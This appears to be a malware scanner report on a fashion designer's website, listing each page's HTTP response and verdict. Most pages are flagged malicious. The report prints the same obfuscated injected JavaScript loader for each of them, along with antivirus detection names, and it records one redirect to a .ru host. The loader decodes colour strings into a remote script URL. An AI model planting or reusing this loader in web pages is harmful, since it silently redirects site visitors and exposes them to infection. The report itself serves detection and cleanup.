Request | Server response | Status |
http://cristinavasiliky.com/ | 200 OK Content-Length: 5871 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i
... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById || !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();}Antivirus reports:- AntiVir
- JS/Redirect.AC
- Avast
- JS:Redirector-IX [Trj]
- Ikarus
- Trojan.JS.Redirector
- Rising
- Trojan.Script.JS.Redirector.r
- nProtect
- Trojan.JS.Agent.EHT
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EHT (B)
- Comodo
- TrojWare.JS.Agent.AC
- Kaspersky
- Trojan.JS.Redirector.qe
- Microsoft
- VirTool:JS/Obfuscator.BK
- MicroWorld-eScan
- Trojan.JS.Agent.EHT
- Fortinet
- JS/Fraud.BBBK!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Redirector.ductl
- F-Secure
- Trojan.JS.Agent.EHT
- F-Prot
- JS/Redir.FN
- AVG
- JS/Redir
- Norman
- Obfuscated.CD
- Sophos
- JS/ScrLd-E
- GData
- Trojan.JS.Agent.EHT
- Commtouch
- JS/Redir.FN
- ESET-NOD32
- JS/Kryptik.W.Gen
- BitDefender
- Trojan.JS.Agent.EHT
|
http://cristinavasiliky.com/home.php | 200 OK Content-Length: 9014 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i
... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById || !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();}Antivirus reports:- AntiVir
- JS/Redirect.AC
- Avast
- JS:Redirector-IX [Trj]
- Ikarus
- Trojan.JS.Redirector
- Rising
- Trojan.Script.JS.Redirector.r
- nProtect
- Trojan.JS.Agent.EHT
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EHT (B)
- Comodo
- TrojWare.JS.Agent.AC
- Kaspersky
- Trojan.JS.Redirector.qe
- Microsoft
- VirTool:JS/Obfuscator.BK
- MicroWorld-eScan
- Trojan.JS.Agent.EHT
- Fortinet
- JS/Fraud.BBBK!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Redirector.ductl
- F-Secure
- Trojan.JS.Agent.EHT
- F-Prot
- JS/Redir.FN
- AVG
- JS/Redir
- Norman
- Obfuscated.CD
- Sophos
- JS/ScrLd-E
- GData
- Trojan.JS.Agent.EHT
- Commtouch
- JS/Redir.FN
- ESET-NOD32
- JS/Kryptik.W.Gen
- BitDefender
- Trojan.JS.Agent.EHT
|
http://cristinavasiliky.com/philosophy.php | 200 OK Content-Length: 9551 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i
... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById || !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();}Antivirus reports:- AntiVir
- JS/Redirect.AC
- Avast
- JS:Redirector-IX [Trj]
- Ikarus
- Trojan.JS.Redirector
- Rising
- Trojan.Script.JS.Redirector.r
- nProtect
- Trojan.JS.Agent.EHT
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EHT (B)
- Comodo
- TrojWare.JS.Agent.AC
- Kaspersky
- Trojan.JS.Redirector.qe
- Microsoft
- VirTool:JS/Obfuscator.BK
- MicroWorld-eScan
- Trojan.JS.Agent.EHT
- Fortinet
- JS/Fraud.BBBK!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Redirector.ductl
- F-Secure
- Trojan.JS.Agent.EHT
- F-Prot
- JS/Redir.FN
- AVG
- JS/Redir
- Norman
- Obfuscated.CD
- Sophos
- JS/ScrLd-E
- GData
- Trojan.JS.Agent.EHT
- Commtouch
- JS/Redir.FN
- ESET-NOD32
- JS/Kryptik.W.Gen
- BitDefender
- Trojan.JS.Agent.EHT
|
http://cristinavasiliky.com/collection.php | 200 OK Content-Length: 19486 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i
... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById || !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();}Antivirus reports:- AntiVir
- JS/Redirect.AC
- Avast
- JS:Redirector-IX [Trj]
- Ikarus
- Trojan.JS.Redirector
- Rising
- Trojan.Script.JS.Redirector.r
- nProtect
- Trojan.JS.Agent.EHT
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EHT (B)
- Comodo
- TrojWare.JS.Agent.AC
- Kaspersky
- Trojan.JS.Redirector.qe
- Microsoft
- VirTool:JS/Obfuscator.BK
- MicroWorld-eScan
- Trojan.JS.Agent.EHT
- Fortinet
- JS/Fraud.BBBK!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Redirector.ductl
- F-Secure
- Trojan.JS.Agent.EHT
- F-Prot
- JS/Redir.FN
- AVG
- JS/Redir
- Norman
- Obfuscated.CD
- Sophos
- JS/ScrLd-E
- GData
- Trojan.JS.Agent.EHT
- Commtouch
- JS/Redir.FN
- ESET-NOD32
- JS/Kryptik.W.Gen
- BitDefender
- Trojan.JS.Agent.EHT
|
http://cristinavasiliky.com/boutiques.php | 200 OK Content-Length: 10350 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i
... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById || !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();}Antivirus reports:- AntiVir
- JS/Redirect.AC
- Avast
- JS:Redirector-IX [Trj]
- Ikarus
- Trojan.JS.Redirector
- Rising
- Trojan.Script.JS.Redirector.r
- nProtect
- Trojan.JS.Agent.EHT
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EHT (B)
- Comodo
- TrojWare.JS.Agent.AC
- Kaspersky
- Trojan.JS.Redirector.qe
- Microsoft
- VirTool:JS/Obfuscator.BK
- MicroWorld-eScan
- Trojan.JS.Agent.EHT
- Fortinet
- JS/Fraud.BBBK!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Redirector.ductl
- F-Secure
- Trojan.JS.Agent.EHT
- F-Prot
- JS/Redir.FN
- AVG
- JS/Redir
- Norman
- Obfuscated.CD
- Sophos
- JS/ScrLd-E
- GData
- Trojan.JS.Agent.EHT
- Commtouch
- JS/Redir.FN
- ESET-NOD32
- JS/Kryptik.W.Gen
- BitDefender
- Trojan.JS.Agent.EHT
|
http://cristinavasiliky.com/upcoming.php | 200 OK Content-Length: 9641 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i
... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById || !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();}Antivirus reports:- AntiVir
- JS/Redirect.AC
- Avast
- JS:Redirector-IX [Trj]
- Ikarus
- Trojan.JS.Redirector
- Rising
- Trojan.Script.JS.Redirector.r
- nProtect
- Trojan.JS.Agent.EHT
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EHT (B)
- Comodo
- TrojWare.JS.Agent.AC
- Kaspersky
- Trojan.JS.Redirector.qe
- Microsoft
- VirTool:JS/Obfuscator.BK
- MicroWorld-eScan
- Trojan.JS.Agent.EHT
- Fortinet
- JS/Fraud.BBBK!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Redirector.ductl
- F-Secure
- Trojan.JS.Agent.EHT
- F-Prot
- JS/Redir.FN
- AVG
- JS/Redir
- Norman
- Obfuscated.CD
- Sophos
- JS/ScrLd-E
- GData
- Trojan.JS.Agent.EHT
- Commtouch
- JS/Redir.FN
- ESET-NOD32
- JS/Kryptik.W.Gen
- BitDefender
- Trojan.JS.Agent.EHT
|
http://cristinavasiliky.com/press.php | 200 OK Content-Length: 9461 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i
... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById || !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();}Antivirus reports:- AntiVir
- JS/Redirect.AC
- Avast
- JS:Redirector-IX [Trj]
- Ikarus
- Trojan.JS.Redirector
- Rising
- Trojan.Script.JS.Redirector.r
- nProtect
- Trojan.JS.Agent.EHT
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EHT (B)
- Comodo
- TrojWare.JS.Agent.AC
- Kaspersky
- Trojan.JS.Redirector.qe
- Microsoft
- VirTool:JS/Obfuscator.BK
- MicroWorld-eScan
- Trojan.JS.Agent.EHT
- Fortinet
- JS/Fraud.BBBK!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Redirector.ductl
- F-Secure
- Trojan.JS.Agent.EHT
- F-Prot
- JS/Redir.FN
- AVG
- JS/Redir
- Norman
- Obfuscated.CD
- Sophos
- JS/ScrLd-E
- GData
- Trojan.JS.Agent.EHT
- Commtouch
- JS/Redir.FN
- ESET-NOD32
- JS/Kryptik.W.Gen
- BitDefender
- Trojan.JS.Agent.EHT
|
http://cristinavasiliky.com/contact.php | 200 OK Content-Length: 8828 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i
... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById || !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();}Antivirus reports:- AntiVir
- JS/Redirect.AC
- Avast
- JS:Redirector-IX [Trj]
- Ikarus
- Trojan.JS.Redirector
- Rising
- Trojan.Script.JS.Redirector.r
- nProtect
- Trojan.JS.Agent.EHT
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EHT (B)
- Comodo
- TrojWare.JS.Agent.AC
- Kaspersky
- Trojan.JS.Redirector.qe
- Microsoft
- VirTool:JS/Obfuscator.BK
- MicroWorld-eScan
- Trojan.JS.Agent.EHT
- Fortinet
- JS/Fraud.BBBK!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Redirector.ductl
- F-Secure
- Trojan.JS.Agent.EHT
- F-Prot
- JS/Redir.FN
- AVG
- JS/Redir
- Norman
- Obfuscated.CD
- Sophos
- JS/ScrLd-E
- GData
- Trojan.JS.Agent.EHT
- Commtouch
- JS/Redir.FN
- ESET-NOD32
- JS/Kryptik.W.Gen
- BitDefender
- Trojan.JS.Agent.EHT
|
http://cristinavasiliky.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 21 Sep 2014 12:18:37 GMT Location: http://rebrendwhois.ru/borabora/index.php Server: Apache/2.0.52 (Red Hat) Content-Length: 312 Content-Type: text/html; charset=iso-8859-1
| malicious |
http://rebrendwhois.ru/borabora/index.php | 500 Can't connect to rebrendwhois.ru:80 (Bad hostname) Content-Length: 162 Content-Type: text/plain | clean |
http://rebrendwhois.ru/test404page.js | 500 Can't connect to rebrendwhois.ru:80 (Bad hostname) Content-Length: 162 Content-Type: text/plain | clean |
http://cristinavasiliky.com/press_101.php | 200 OK Content-Length: 8693 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i
... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById || !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();}Antivirus reports:- AntiVir
- JS/Redirect.AC
- Avast
- JS:Redirector-IX [Trj]
- Ikarus
- Trojan.JS.Redirector
- Rising
- Trojan.Script.JS.Redirector.r
- nProtect
- Trojan.JS.Agent.EHT
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EHT (B)
- Comodo
- TrojWare.JS.Agent.AC
- Kaspersky
- Trojan.JS.Redirector.qe
- Microsoft
- VirTool:JS/Obfuscator.BK
- MicroWorld-eScan
- Trojan.JS.Agent.EHT
- Fortinet
- JS/Fraud.BBBK!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Redirector.ductl
- F-Secure
- Trojan.JS.Agent.EHT
- F-Prot
- JS/Redir.FN
- AVG
- JS/Redir
- Norman
- Obfuscated.CD
- Sophos
- JS/ScrLd-E
- GData
- Trojan.JS.Agent.EHT
- Commtouch
- JS/Redir.FN
- ESET-NOD32
- JS/Kryptik.W.Gen
- BitDefender
- Trojan.JS.Agent.EHT
|
http://cristinavasiliky.com/press_mann.php | 200 OK Content-Length: 8650 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i
... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById || !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();}Antivirus reports:- AntiVir
- JS/Redirect.AC
- Avast
- JS:Redirector-IX [Trj]
- Ikarus
- Trojan.JS.Redirector
- Rising
- Trojan.Script.JS.Redirector.r
- nProtect
- Trojan.JS.Agent.EHT
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EHT (B)
- Comodo
- TrojWare.JS.Agent.AC
- Kaspersky
- Trojan.JS.Redirector.qe
- Microsoft
- VirTool:JS/Obfuscator.BK
- MicroWorld-eScan
- Trojan.JS.Agent.EHT
- Fortinet
- JS/Fraud.BBBK!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Redirector.ductl
- F-Secure
- Trojan.JS.Agent.EHT
- F-Prot
- JS/Redir.FN
- AVG
- JS/Redir
- Norman
- Obfuscated.CD
- Sophos
- JS/ScrLd-E
- GData
- Trojan.JS.Agent.EHT
- Commtouch
- JS/Redir.FN
- ESET-NOD32
- JS/Kryptik.W.Gen
- BitDefender
- Trojan.JS.Agent.EHT
|
http://cristinavasiliky.com/images/fashion-mann.jpg | 200 OK Content-Length: 301184 Content-Type: image/jpeg | clean |
http://cristinavasiliky.com/press_accessories.php | 200 OK Content-Length: 8870 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i
... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById || !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();}Antivirus reports:- AntiVir
- JS/Redirect.AC
- Avast
- JS:Redirector-IX [Trj]
- Ikarus
- Trojan.JS.Redirector
- Rising
- Trojan.Script.JS.Redirector.r
- nProtect
- Trojan.JS.Agent.EHT
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EHT (B)
- Comodo
- TrojWare.JS.Agent.AC
- Kaspersky
- Trojan.JS.Redirector.qe
- Microsoft
- VirTool:JS/Obfuscator.BK
- MicroWorld-eScan
- Trojan.JS.Agent.EHT
- Fortinet
- JS/Fraud.BBBK!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Redirector.ductl
- F-Secure
- Trojan.JS.Agent.EHT
- F-Prot
- JS/Redir.FN
- AVG
- JS/Redir
- Norman
- Obfuscated.CD
- Sophos
- JS/ScrLd-E
- GData
- Trojan.JS.Agent.EHT
- Commtouch
- JS/Redir.FN
- ESET-NOD32
- JS/Kryptik.W.Gen
- BitDefender
- Trojan.JS.Agent.EHT
|
http://cristinavasiliky.com/press_fundraiser.php | 200 OK Content-Length: 12412 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7d', '#748682', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) {var s = "";for (j=0;j<t.length;j++) {var c_rgb = t[j];for (i=1;i
... 381 bytes are skipped ...)+new Date().getTime();}return s; } function try_pick_colors() {try { if(!document.getElementById || !document.createElement){document.write(div_pick_colors(div_colors,1)); } else {var new_cstyle=document.createElement("script");new_cstyle.type="text/javascript";new_cstyle.src=div_pick_colors(div_colors,0);document.getElementsByTagName("head")[0].appendChild(new_cstyle);}} catch(e) { }try {check_colors_picked();} catch(e) { setTimeout("try_pick_colors()", 500);} } try_pick_colors();}Antivirus reports:- AntiVir
- JS/Redirect.AC
- Avast
- JS:Redirector-IX [Trj]
- Ikarus
- Trojan.JS.Redirector
- Rising
- Trojan.Script.JS.Redirector.r
- nProtect
- Trojan.JS.Agent.EHT
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EHT (B)
- Comodo
- TrojWare.JS.Agent.AC
- Kaspersky
- Trojan.JS.Redirector.qe
- Microsoft
- VirTool:JS/Obfuscator.BK
- MicroWorld-eScan
- Trojan.JS.Agent.EHT
- Fortinet
- JS/Fraud.BBBK!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Redirector.ductl
- F-Secure
- Trojan.JS.Agent.EHT
- F-Prot
- JS/Redir.FN
- AVG
- JS/Redir
- Norman
- Obfuscated.CD
- Sophos
- JS/ScrLd-E
- GData
- Trojan.JS.Agent.EHT
- Commtouch
- JS/Redir.FN
- ESET-NOD32
- JS/Kryptik.W.Gen
- BitDefender
- Trojan.JS.Agent.EHT
|